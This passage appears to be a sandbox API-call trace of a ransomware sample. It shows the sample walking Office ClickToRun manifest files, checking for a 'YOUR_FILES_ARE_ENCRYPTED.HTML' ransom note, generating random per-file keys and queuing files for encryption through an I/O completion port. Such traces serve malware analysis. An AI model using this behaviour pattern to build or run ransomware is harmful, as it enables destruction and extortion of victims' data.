param_1=0x19ea5e, param_2="%02X" | out: param_1="3F") returned 2 [0105.885] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="24") returned 2 [0105.886] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" [0105.886] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.886] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0105.887] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65aa9e3b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.proofing.msi.16.en-us.xml", cAlternateFileName="C24618~1.XML")) returned 1 [0105.887] StrStrIW (lpFirst="C2RManifest.proofing.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.887] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned 116 [0105.887] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml") returned=".xml" [0105.888] lstrlenW (lpString=".xml") returned 4 [0105.888] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml") returned=".xml" [0105.888] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.888] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.897] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2042) returned 1 [0105.897] GetProcessHeap () returned 0x600000 [0105.897] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.900] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="8E") returned 2 [0105.900] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="5E") returned 2 [0105.900] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="7F") returned 2 [0105.900] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="DB") returned 2 [0105.900] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="DE") returned 2 [0105.900] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B1") returned 2 [0105.900] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="01") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="9E") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="1F") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1A") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="F3") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="27") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D3") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="51") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="57") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="DB") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="6B") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="53") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="04") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="30") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="04") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="BC") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="B0") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="EE") returned 2 [0105.900] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="66") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B0") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="8B") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="BD") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A3") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="98") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="CD") returned 2 [0105.901] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="3F") returned 2 [0105.902] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" [0105.902] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.902] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.902] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x646e8b6c, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x12d6e, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cAlternateFileName="C2C6D1~1.XML")) returned 1 [0105.902] StrStrIW (lpFirst="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.902] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned 135 [0105.902] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned=".xml" [0105.902] lstrlenW (lpString=".xml") returned 4 [0105.902] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned=".xml" [0105.902] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.903] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=77166) returned 1 [0105.903] GetProcessHeap () returned 0x600000 [0105.903] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.906] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E3") returned 2 [0105.906] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="F9") returned 2 [0105.906] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B2") returned 2 [0105.906] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="13") returned 2 [0105.906] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="89") returned 2 [0105.906] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="4F") returned 2 [0105.906] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="11") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="2B") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="0C") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="01") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="97") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="8C") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="CF") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="CD") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="F1") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="84") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="D4") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="E0") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="1A") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="29") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="BC") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="76") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="5E") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="F8") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="F5") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="40") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="3D") returned 2 [0105.906] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="6F") returned 2 [0105.907] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="08") returned 2 [0105.907] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="A0") returned 2 [0105.907] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="08") returned 2 [0105.907] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7B") returned 2 [0105.907] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" [0105.908] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.908] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.908] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b2cf46, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b2cf46, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65acff84, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3708, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.publishermui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~4.XML")) returned 1 [0105.908] StrStrIW (lpFirst="C2RManifest.publishermui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.908] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned 120 [0105.908] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml") returned=".xml" [0105.908] lstrlenW (lpString=".xml") returned 4 [0105.908] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml") returned=".xml" [0105.908] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.908] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0105.908] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=14088) returned 1 [0105.908] GetProcessHeap () returned 0x600000 [0105.908] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0105.912] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="C1") returned 2 [0105.912] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="64") returned 2 [0105.912] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="46") returned 2 [0105.912] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="B4") returned 2 [0105.912] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E8") returned 2 [0105.912] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="0F") returned 2 [0105.912] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="2A") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E9") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="89") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="78") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CF") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="02") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="44") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="44") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="CF") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="10") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="93") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="16") returned 2 [0105.912] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D0") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="36") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="D8") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="75") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="88") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="40") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="BA") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3E") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="F6") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="48") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="1F") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="25") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="9C") returned 2 [0105.913] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7B") returned 2 [0105.914] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" [0105.914] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.914] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0105.914] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82adb9f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82adb9f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6469c575, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xaac34, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~3.XML")) returned 1 [0105.914] StrStrIW (lpFirst="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.914] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned 129 [0105.914] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned=".xml" [0105.914] lstrlenW (lpString=".xml") returned 4 [0105.914] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned=".xml" [0105.914] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.914] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.915] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=699444) returned 1 [0105.915] GetProcessHeap () returned 0x600000 [0105.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0105.918] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="4F") returned 2 [0105.918] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="94") returned 2 [0105.919] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="4E") returned 2 [0105.919] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="8E") returned 2 [0105.919] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="19") returned 2 [0105.919] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="26") returned 2 [0105.919] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BB") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="94") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="C9") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="85") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="60") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="18") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="04") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="73") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="41") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="D9") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F9") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="5E") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="4E") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DD") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E0") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="20") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="17") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="94") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E1") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="27") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="96") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A3") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="B1") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="49") returned 2 [0105.919] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="AD") returned 2 [0105.920] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="72") returned 2 [0105.920] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" [0105.920] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.921] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0105.921] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a0dba7, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82a0dba7, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64ca2e69, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x15286, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~2.XML")) returned 1 [0105.921] StrStrIW (lpFirst="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.921] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned 125 [0105.921] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned=".xml" [0105.921] lstrlenW (lpString=".xml") returned 4 [0105.921] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned=".xml" [0105.921] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.921] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0105.921] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=86662) returned 1 [0105.921] GetProcessHeap () returned 0x600000 [0105.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0105.924] wsprintfW (in: param_1=0x19e9e6, 